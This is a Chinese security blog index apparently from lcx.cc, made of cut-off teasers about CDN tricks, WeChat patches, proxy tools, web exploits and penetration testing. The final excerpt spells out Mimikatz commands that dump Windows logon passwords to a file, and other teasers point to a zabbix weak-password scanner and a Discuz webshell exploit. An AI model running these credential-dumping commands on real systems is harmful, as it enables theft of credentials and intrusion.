前言 网上有一堆微信电脑版多开、防撤回等破解补丁，可以实现类似的功能，但是微信是比较涉及个人隐私的社交软件，所以网上公开的补丁基本都不敢用，万

前言 大概在 2010 年前后，那会儿非常流行搭博客，核总本人也想搭一个，但是找来找去，找不到一个安全、简洁、高效的博客程序，于是乎狠心下来自己从零开发

首先概述一下关键信息，我网名叫核攻击，人送外号“核总”，从事网络安全行业已有十多年，常年混迹于国内外各大安全圈，在 T00ls、乌云等各大知名

.eml 后缀的邮件文件相信大家并不陌生，应该都见过，没见过也不要紧，随便找个邮箱，选择一封邮件，然后导出或者显示邮件原文，就能看到 .eml 文件格式或者内

rc4 是一种很常见的加密算法，编程经常用到，然而之前网上找了一大圈没有顺手的，所以之前自己花了点时间写了一个小工具，十分方便好用，同时支持二进制

核总(https://lcx.cc/)在工作中经常需要追踪某个用户、访客的详细访问轨迹，用于逆向反查、调查分析、溯源追踪、电子取证，以帮助定

核总(https://lcx.cc/)自从业以来，因为行业特殊，所以一直有各种相关需要，于是这些年从各个地方收集了一些国、内外免费临时接收邮

Cloudflare CDN 如何实现自定义源站端口、代理、端口转发任何协议？ 根据官方参考文章内容“Which ports will Cloudflare work with?”所述，Cloudflare 支持以下方

众所周知，小米安卓（Android）手机 MIUI 系统有个很狗血的特点：温控！ 核总(https://lcx.cc/)用小米手机也很多年了，温控也关注

FreeFileSync (官网: https://freefilesync.org/) 是一款免费、开源的文件夹比较和同步软件，跨平台、多协议、双向文件夹对比同步工具，支持 Google Driver、SFTP(SSH)、FTP 等

相信很多人碰到过这样的场景： 某苦逼程序猿白天在公司努力干活，下班还需要把公司的文件资料带回家继续加班工作，第二天早上上班再拿来更新到公司电脑

前言 国内有很多免费 CDN 申请及使用的教程，也有一些简单的速度对比教程，但是没有一篇关于免费流量多少及 DDOS 防御高低的完整对比文章。 数月前，由于有这个

前言 多年前，曾看过此篇文章（内容雷同），以及 BBC 每隔七年跟拍穷人与富人长达 49 年的纪录片：《人生七年》 多年后，再次看到此文，随着人生的成长、学识

zabbix初始口令批量检测小脚本 xyntax | 2016-04-20 12:57 看到这漏洞，WooYun: 奇虎360某IP服务器zabbix弱口令 写了个小脚本做批量。 从shoda

大家来一起柯南一下、分析下案情，迷の密室盗窃案！ Ch丶0nly | 2016-04-20 14:44 楼上朋友的笔记本丢了，只开着窗户（靠墙的窗户5楼 不至于爬那么高偷电脑）门

网络资产信息扫描(F-NAScan) wolf (@伏宸安全) | 2016-04-14 13:00 网络资产信息扫描 在渗透测试(特别是内网)中经常需要对目标进行网络资产收集，即对方服

King Of The Proxy (代理之王) v2.0 发布，HTTP/HTTPS、SOCKS4/5代理采集、验证工具。 时隔三年多，前段时间对代理之王进行了一些升级，老版本见

  前段时间写的一个小脚本，用来检查大量域名注册情况，源码如下： Function echo(s) Wscript.Echo s End Function Public Function MidStr(s, a, b) '从指定字符串中截取两个字符串中间的字符:截取S中从A与

最近一直比较忙，没多余时间更新、管理博客，今天抽时间记录一下…… 这篇采访稿出来有一段时间了，前几天 T00ls.Net、和 FreeBuf.COM 进行了发布： T00

DZ6.x的UC_KEY getwebshell exploit L.N. (http://ln.sycsec.com/) | 2015-11-17 13:55 网上有dz 7.x和dz x系列的uc_key 利用方式，今天遇到了一个dz6.0的网站，于是分析了下代码，

一个基于报错的盲注场景 MayIKissYou | 2015-11-06 16:17 1：背景 近日某壮汉给了我个链接 说有注入 但是过滤了一些关键字 导致数据有些出不来 让我帮忙看看 于是 我看他造爷 就研究了

网站遇黑阔，求分析思路查身份～ zone | 2015-11-03 00:04 朋友的一个刷单平台最近遇到一黑阔，损失了不少，找我帮忙，也没啥好主意，唉~_~ 各位大神快来给点建议分析

窃听蓝牙耳机小实验 mramydnei | 2015-10-19 22:41 上周看了下Hirsch-Bluetooth-Device-Security-2015感觉里面的这段挺好玩的。 Scenarios (5) Example

一条命令找出系统web路径 xsser (十根阳具有长短!!) | 2015-10-23 17:48 经常在一个系统里需要快速定位到web路径，如果在标准化系统里如何一条命令快速实现这一

关于家用智能设备中间人攻击的实用场景考量 么么哒 | 2015-10-26 10:57 首先这个讨论对事不对人,希望大家多发表下自己的观点. 在 geekpwn 看到有演示项目对很多智能设备的 pwn

比 XcodeGhost 更邪恶的手段 30 年前就出现了 最近在开发者圈里讨论最多的莫过于 XcodeGhost。其实在 20 年前，更高明的手段就出现了。 1984 年的时候，UNIX

一些计算流量的CDN厂商(比如加速乐)是怎么计算域名流量的 huoji (有时候,想象力是突破技术瓶颈的关键！) | 2015-10-12 23:59 不是http的流量 是计算纯流量的 比

黑盒测试中那些"看不见的"漏洞 小饼仔 | 2015-09-16 17:01 原文：Hunting Asynchronous Vulnerabilities 简单翻译下大致意思 在黑盒测试中，一般我们通过请求的响应来判断一个漏洞是否存

五道口杀气 | 2015-09-16 16:36 在对一个目标进行渗透测试时，找到了一台服务器的漏洞获取相关权限进入内网，在发现该服务器上并没有什么敏感数据，必须要对其内网进

Mimikatz 使用Tips Evi1cg (感觉自己萌萌哒) | 2015-09-17 16:42 1.记录 Mimikatz输出： C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件： C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt 3.将输出传输